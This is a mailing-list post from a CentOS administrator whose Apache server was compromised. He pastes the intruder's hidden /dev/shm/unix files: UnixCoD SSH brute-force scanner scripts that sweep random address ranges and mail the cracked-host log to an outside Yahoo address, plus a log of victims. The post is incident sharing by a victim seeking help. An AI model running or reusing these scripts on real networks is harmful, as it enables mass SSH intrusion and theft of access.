[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

Wed Jun 3 16:33:26 UTC 2009
Linux Advocate <linuxhousedn at yahoo.com>

BRUCE U ARE A F******* GENIUS MAN !!!!!

u were right bro....thanx for spending the time on this man....

more info below !!!!!!!!!!!!!



----- Original Message ----
> From: bruce <bedouglas at earthlink.net>
> To: linuxhousedn at yahoo.com
> Sent: Wednesday, June 3, 2009 9:53:24 PM
> Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
> 
> hi...
> 
> i've seen a few of your threads on your issue of the 'atack' processes
> running from your web server...
> 
> i'm replying to you offline, as ......
> 
> 
> take a look over your box, and let's see what you have...
> 


as per yr tip i had found a file called atack under this folder /dev/shm/unix .... even though i could not locate such a file before.....
i have now removed that file and am now probing the contents of the /dev/shm/unix folder.....

[root at fwgw unix]# pwd
/dev/shm/unix

[root at fwgw unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache     360 Jun  3 23:47 .
drwxrwxrwt 3 root   root        60 Jun  3 00:24 ..
-rwxr-xr-x 1 apache apache       0 May 19 06:02   124.164.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:28   129.135.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:25   129.find.22
-rwxr-xr-x 1 apache apache       0 May 25 13:54   21.168.find.22
-rwxr-xr-x 1 apache apache   12687 May 25 06:16  60.191.find.22
-rw-r--r-- 1 apache apache       0 Jun  3 23:45   83.182.find.22
-rwxr-xr-x 1 apache apache    4631 Apr 21 17:50   84.2.find.22
-rwxr-xr-x 1 apache apache       0 May 25 06:17   89.38.find.22
-rwxr-xr-x 1 apache apache    2362 May 19 15:28   91.204.find.22
-rwxr-xr-x 1 apache apache     216 May 18  2005   auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41  data.conf
-rwxr-xr-x 1 apache apache   15729 Oct 14  2005  find
-rw-r--r-- 1 apache apache    5262 Jun  3 23:45  log
-rwxr-xr-x 1 apache apache     751 May 25 06:33  unix
-rw-r--r-- 1 apache apache       0 Jun  3 23:04   vuln.txt
-rwxr-xr-x 1 apache apache     671 May 25 13:56  x


The contents of  file 'x' are;


#!/bin/bash
echo "[+] PLM prea destept pentru voi : Yuli [+]"
X=0
c=0
while [ $X -le 255 ]
do
c=$RANDOM
let "c %= 255"
echo "[+] Scanam radom class b $1.$c [+]"
./find $1.$c 22
sleep 10
cat $1.$c.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100 >> log
mail -s $1.$c yuli1989xxx at yahoo.com < log
rm -rf $1.$c.find.22 ip.conf
echo "[+] Scanner a terminat de scanat !"
echo "[+] Next random class b !"
X=$((X+1))


the contents of the file 'unix' are;


#!/bin/bash
if [ $# != 1 ]; then
        echo "[+] Folosim : $0 [b class]"
        exit;
fi

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+]   SSH Brute force scanner : user & password   [+]"
echo "[+]        Undernet Channel : #yuli               [+]"
echo "[+][+][+][+][+][+][+] ver 0x10  [+][+][+][+][+][+][+]"
./find $1 22

sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"


the contents of 'auto' are;

#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
        echo -n "./assh $brange.$crange ; " >> $file
        let crange=crange+1
done


the contents of 'log' are;

[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]


Further googling indicates that UnixCod  is a brute force ssh scanner... what is is odd is that i have fail2ban ruunning ( which blocks IPs after 2 failed attempts) and a 8 letter passwd but i still got hacked....

Guys...any comments....

AND ONCE AGAIN THANKS BRUCE !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Regards,
Marco.